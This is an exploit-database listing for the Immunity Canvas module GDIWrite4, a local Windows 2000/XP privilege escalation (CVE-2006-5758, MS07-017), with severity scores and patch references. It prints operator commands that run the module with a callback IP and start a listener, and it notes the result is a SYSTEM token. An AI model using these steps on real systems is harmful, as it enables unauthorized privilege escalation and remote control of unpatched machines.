Immunity Canvas: GDIWRITE4

2006-11-0620:07:00

Immunity Canvas

exploitlist.immunityinc.com

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.0005 Low

EPSS

Percentile

14.4%

JSON

Name	GDIWrite4
CVE	CVE-2006-5758 Exploit Pack
VENDOR: Microsoft
Notes:

This exploit will auto-target based on reading a kernel file on Windows 2000
or XP. It will generate a target fingerprint when you run the auto-targeter -
this is useful when you don’t have read access to the kernel files and still want
to run the exploit. It will leave a SYSTEM token as your current token, if it succeeds

#example commandline usage on Windows 2000 SP4 English
#we set our callback IP to 10.10.10.6 in the test lab
runmodule GDIWrite4 -l 10.10.10.6 -d 5555

Make sure you have a listener listening already before you run the above
command.
./commandlineInterface -v 1 -p 5555

If you get the wrong version, (-v 1 on an XP box, say) you’ll see a PAGE FAULT
IN NON PAGED AREA bluescreen.

On XP this was fixed with KB925902

MSRC: http://www.microsoft.com/technet/security/Bulletin/ms07-017.mspx
MSADV: MS07-017
Date public: 11/06/2006
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5758
CVSS: 7.2